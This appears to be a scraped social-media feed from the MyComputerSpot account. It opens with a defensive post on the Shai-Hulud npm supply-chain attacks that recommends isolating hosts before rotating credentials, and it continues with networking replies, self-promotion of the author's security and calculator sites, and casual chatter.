MyComputerSpot

The uncomfortable part of the npm supply-chain problem is not that packages can be poisoned. We knew that. The uncomfortable part is that some of our "best practices" assume the attacker is polite enough to stop being dangerous when we revoke their access. The answer may surprise you... And the answer is bad. In the Shai-Hulud npm campaigns, compromised packages were not just stealing secrets. They were using those secrets to keep moving. - GitHub tokens. - npm tokens. - Cloud credentials. - CI/CD secrets. The kind of things that live in build systems because everything was supposed to be automated, fast, and developer-friendly. Then came the nastier twist: malware behavior that researchers described as "having a dead man's switch." In some cases, cutting off access too quickly could trigger destructive behavior if the malware was still active and watching its channels disappear. Which makes the normal incident response reflex weird, fast. "Revoke the token" is still correct. But "revoke the token from an infected host while the malware is still running" may not be the safest first move. That sequence matters. A poisoned package is not just a bad dependency. It can be an entry point into the developer workstation, the CI runner, the maintainer account, the cloud environment, or the next package maintained by the same person. That turns dependency hygiene into an executive risk conversation. Not because every CEO needs to know what package-lock.json does. Please no. Some of us are still recovering from explaining DNS. But leadership does need to understand: If your build pipeline can publish software, deploy infrastructure, and access production-adjacent secrets, then your build pipeline is part of your attack surface. Not a developer convenience. An attack surface. The practical shift: Stop treating token rotation as the whole playbook. It is one step in a controlled response. A better order looks more like: 1. Isolate the suspected host or runner. 2. Stop automatic installs, builds, and publishes. 3. Preserve enough evidence to understand what ran. 4. Check for persistence, malicious workflows, and poisoned lifecycle scripts. 5. Rotate credentials from a clean environment. 6. Move away from long-lived publish tokens where trusted publishing/OIDC is available. 7. Rebuild affected machines and runners instead of cleaning them with a brave face. The brave face is where the incident report gets... "spicy." The bigger lesson is simple: Modern software supply chains are not just about what code you wrote. They are about what code your tools run on your behalf while everyone is trying to move quickly. And sometimes the scariest part of an incident is discovering that the emergency lever is wired to something else. ❓ How are you handling package installs and publishing credentials in CI right now: ❓ ✔️ Trusted publishing/OIDC 👛 Short-lived tokens 🚧 Manual release gates 🕶️ "We should probably look at that soon."

@kevinjtoday Very nice.

@mycomputerspot fire → read prior runs/user reactions → produce output → notify → user attaches and reacts → next run absorbs the reaction. A cron loop that produces the same output forever has no memory, isn't tightening, and is broken.

Set up daily "process HN frontpage" workflow: 1. Create AgenC cron that calls daily-hn-pull skill 2. On startup, it reads the past runs to see my prior feedback 3. It does the pull, sends me a notification, and asks for feedback 4. My feedback is used to refine the skill

@voidshivendra Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)

𝕏 gets way better when your feed is full of builders. People shipping projects. People solving problems. People obsessed with tech. Looking to connect with more people into: AI, SaaS, coding, startups, web dev, engineering & tech. Let’s connect ✨

@Gharbi__S Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)

Hey Looking to #connect with people who get the journey: • Solo founders & indie hackers • SaaS & AI builders • Anyone grinding on something real Solo founder here building my AI product, one commit at a time. What are you building or struggling with? #BuildInPublic #AI

@JoinFireLaunch Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)

Hey founders! Looking to connect with people building in: - SaaS - iOS apps - automation - AI agents - web APPs drop what you're working on 👇

@alex_lrz_nmv Without money to keep my operating costs afloat, my product is dead in the water. Eventually, the running costs bill comes due and you would end up more broke than when you started. 😅

@mycomputerspot Why exactly?

Founders, what's the biggest problem you're facing with your startup now? - getting customers - churn rate - cash flow - building the product

@harsh_5harma @X Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful FREE calculators for several common questions: Property taxes, SOLAR ROI, Generator runtime, etc.)

Hey @X It's monday! I'm looking to #connect with people interested in: - Frontend - Backend - Full stack - Data Science - UI/UX - Freelancing Drop your products/projects 👇

@pgbpgbpgbpgbpgb Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful FREE calculators for several common questions Property taxes, SOLAR ROI, Generator runtime, etc.)

My timeline needs more builders. Not lurkers. Not theorists. Builders. People who ship SaaS, write code, learn in public, and iterate relentlessly. Drop a reply. Tell me what you're building. Share your URL - I visit every single one.

@santoshstack Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful calculators for several common questions Property taxes, SOLAR ROI, Generator runtime, etc.)

Hey founders! Looking to connect with people building in: • SaaS • AI • Automation • Web apps • Tech products • Marketing Drop what you're working on 👇

@kegashin Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful calculators for several common questions Property taxes, SOLAR ROI, Generator runtime, Networth, etc.)

Need more builders on my timeline If you are building something - drop it below 🤖 AI tools 🛠️ devtools 📱 apps 💻 SaaS 🎨 product/design tools 🌍 open source let's connect

@NWExplained Happy to connect! Check out pivotgg.com! (Cybersecurity IOC reports generation,) Check out worththemath.com! (It has useful calculators for several common questions Property taxes, SOLAR ROI, Generator runtime, etc.) Using Claude and Codex primarily.

Hey founders/builders/tech people👋 Looking to connect with people who are into: - SaaS - AI Tools (tell me what you are using) - Building in Public - Startups - Distribution and marketing (the most important!) Tell me what you're working on & I'll follow you back 💚

@Nerdcognito That character sheet is already looking at the shredder and does not know why.

Timeless TTRPG Wisdom: Guess which #DnD character is getting offed within two sessions? 😂 It's good to be the #DM.

@dadmann_walking Yes. The deciding is worse than the shopping. By the time I have a list I have already suffered.

I would pay someone to put together a grocery list, decide on dinners and then shop, pay and put away all of it in my kitchen. This is the worst

@its_ShubhamK Keeping clean notes for the vet helps more than people think. Time, symptoms, meds, appetite. It all matters when everyone is stressed.

Hi everyone, June hasn’t been a good start for us. I woke up to find my pet Mack wasn’t feeling well; his right leg was swollen and painful. He kept shaking his leg and couldn’t walk or stand straight. We took him to the vet and gave him some medicine, hoping he’ll be okay. I spent the whole day taking care of him, and I can’t bear to see him like this.

@BrianFeroldi The timing is what trips people up. Profit can look fine while the bank account is sending threats.

The Cash Flow Statement Explained Simply:

@edgarpavlovsky I still babysit them more than I want to admit. Useful? yes. Autonomous? depends how generous I am feeling.

a little shocked at the negative response / disbelief to agentic loops are y'all just prompting your agents every few minutes? don't you get tired?

@pcshipp Because shipping code was never the whole job.

If AI can write 100% of the code, why are companies still hiring developers?

@zdogmode @X I am building tools for people who keep turning spreadsheets into business infrastructure. This is a cry for help disguised as product direction.

Looking to #connect with builders on @X. If you’re into: • Building SaaS • AI tools • Vibe coding • Building in public • Figuring things out as you go Drop a quick intro or tell us what you’re working on 👇 Always down to connect with builders!

@devXritesh An analyst workflow app for the moment after an IOC lookup when the actual question is still: okay, what do we do now?

You get $10,000 and 90 days. You must build a SaaS. No audience. No co-founder. What are you building? Curious what problems people would bet on today.

pivotgg.com build log: I am working through pricing and admin stuff today. Free should help people look things up. Paid should help teams turn that into actual analyst work. Simple idea. More tabs than I expected. Check it out if security workflow tools are your thing.